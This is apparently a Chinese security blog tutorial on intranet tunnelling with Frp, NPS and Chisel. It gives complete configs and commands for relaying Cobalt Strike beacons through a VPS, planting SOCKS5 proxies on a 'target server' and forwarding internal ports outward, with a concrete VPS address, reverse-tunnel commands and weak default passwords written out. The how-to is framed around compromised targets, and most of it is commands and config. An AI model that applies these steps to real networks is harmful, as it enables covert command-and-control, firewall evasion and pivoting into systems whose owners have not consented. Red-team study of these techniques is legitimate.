当前位置：首页 > news >正文

内网对抗-隧道技术篇防火墙组策略FRPNPSChiselSocks代理端口映射C2上线

news 2026/3/30 15:55:23

知识点：

1、隧道技术篇-传输层-工具项目-Frp&Nps&Chisel
2、隧道技术篇-传输层-端口转发&Socks建立&C2上线

在这里插入图片描述

Frp
Frp是专注于内网穿透的高性能的反向代理应用，支持TCP、UDP、HTTP、HTTPS等多种协议。可以将内网服务以安全、便捷的方式通过具有公网IP节点的中转暴露到公网。
项目下载：https://github.com/fatedier/frp
下载下来有客户端和服务端两个不同文件

Nps
Nps是一款轻量级、高性能、功能强大的内网穿透代理服务器。目前支持tcp、udp流量转发，可支持任何tcp、udp上层协议（访问内网网站、本地支付接口调试、ssh访问、远程桌面，DNS解析等），此外还支持内网http代理、内网socks5代理、p2p等，并带有功能强大的web管理端。
项目下载：https://github.com/ehang-io/nps
下载下来有客户端和服务端两个不同文件

在这里插入图片描述

Chisel
Chisel 是一个快速 TCP/UDP 隧道，通过 HTTP 传输，通过 SSH 保护。单个可执行文件包括客户端和服务器。用 Go（golang）编写。 Chisel 主要用于穿过防火墙，但也可用于为网络提供安全端点。
项目下载：https://github.com/jpillora/chisel
下载下来只有一个文件(既担任服务端，又担任客户端)

一、演示案例-内网穿透-C2上线-Frp&NPS&Chisel

frp

1、VPS-服务端-下载-解压-修改-启动

阿里云主机记得修改安全组配置出入口
修改配置文件frps.ini：
[common]
bind_port = 7000VPS上启动服务端：
./frps -c ./frps.ini

2、内网kali-客户端-下载-解压-修改-启动

修改配置文件frpc.ini：
[common]
serverAddr = "47.98.210.85"
serverPort = 7000
[[proxies]]
name = "test-tcp"
type = "tcp"
localIP = "127.0.0.1"
localPort = 5555
remotePort = 6666内网kali启动客户端：./frpc -c ./frpc.ini

在这里插入图片描述

3、CS配置监听器

监听器1：VPS-IP:6666
监听器2：CS-IP:5555
后门生成：监听器1

在这里插入图片描述

nps

1、VPS启动

./nps

在这里插入图片描述

http://VPS-IP:8080/ admin/123

在这里插入图片描述

2、创建客户端，生成密匙

在这里插入图片描述

./npc -server=VPS-IP:8024 -vkey=xxxxxx

在这里插入图片描述

3、添加协议隧道，绑定指向

远程绑定6666,指向本地5555
在这里插入图片描述

4、CS配置监听器

监听器1：VPS-IP:6666
监听器2：CS-IP:5555
后门生成：监听器1

在这里插入图片描述

chisel

1、vps-建立服务端监听1234

./chisel server -p 1234 --reverse

在这里插入图片描述

2、建立客户端连接服务端后将141上5555给到服务端6666上

./chisel client -v 47.98.210.85:1234 R:0.0.0.0:6666:192.168.139.141:5555

在这里插入图片描述

二、演示案例-内网穿透-Socks建立-Frp&NPS&Chisel

frp

1、启动服务端(VPS)

frps -c frpssock.ini[common]
bind_port = 7000
bind_addr = 0.0.0.0
dashboard_port = 7500
dashboard_user = admin
dashboard_pwd = admin@123
log_frp = /var/log/frps.log
log_level = info
log_max_days = 3
authentication_timeout = 0
max_pool_count = 50
allow_ports = 80-50000

在这里插入图片描述

2、启动客户端(放到目标服务器上运行)

frpc -c frpcsock.ini   //这个ini可以自定义[common]
server_addr = 47.98.210.85
server_port = 7000
tls_enable = ture    
pool_count = 5
[plugin_socks]
type = tcp
remote_port = 6000
plugin = socks5
plugin_user = admin
plugin_passwd = admin@123
use_encryption = true
use_compression = true

在这里插入图片描述

nps

1、建立Socks/HTTP隧道

在这里插入图片描述

2、配合Proxifier规则配置测试

在这里插入图片描述

chisel

1、VPS建立服务端监听1090

chisel server -p 1090 --socks5

在这里插入图片描述

2、目标服务器建立客户端连接服务端后将使用Socks服务

chisel client 47.98.210.85:1090 socks &

在这里插入图片描述

三、演示案例-内网穿透-端口映射转发-Frp&NPS&Chisel

frp

1、服务端启动(vps)

frps -c frps.ini[common]
bind_port = 7000

在这里插入图片描述

2、客户端启动(目标服务器上运行)

frpc -c frpc.ini[common]
serverAddr = "47.98.210.85"
serverPort = 7000
[[proxies]]
name = "test-tcp"
type = "tcp"
localIP = "192.168.2.22"
localPort = 80
remotePort = 8888

在这里插入图片描述

nps

1、添加协议隧道，绑定目标及端口

在这里插入图片描述

chisel

1、VPS建立服务端监听1234

./chisel server -p 1234 --reverse

在这里插入图片描述

2、目标服务器建立客户端连接服务端后将2.22上80端口给到服务端8888端口上

./chisel client -v 47.98.210.85:1234 R:0.0.0.0:8888:192.168.2.22:80

在这里插入图片描述

一、演示案例-内网穿透-C2上线-Frp&NPS&Chisel

frp

1、VPS-服务端-下载-解压-修改-启动

2、内网kali-客户端-下载-解压-修改-启动

3、CS配置监听器

nps

1、VPS启动

2、创建客户端，生成密匙

3、添加协议隧道，绑定指向

4、CS配置监听器

chisel

1、vps-建立服务端监听1234

2、建立客户端连接服务端后将141上5555给到服务端6666上

二、演示案例-内网穿透-Socks建立-Frp&NPS&Chisel

frp

1、启动服务端(VPS)

2、启动客户端(放到目标服务器上运行)

nps

1、建立Socks/HTTP隧道

2、配合Proxifier规则配置测试

chisel

1、VPS建立服务端监听1090

2、目标服务器建立客户端连接服务端后将使用Socks服务

三、演示案例-内网穿透-端口映射转发-Frp&NPS&Chisel

frp

1、服务端启动(vps)

2、客户端启动(目标服务器上运行)

nps

1、添加协议隧道，绑定目标及端口

chisel

1、VPS建立服务端监听1234

2、目标服务器建立客户端连接服务端后将2.22上80端口给到服务端8888端口上

相关文章：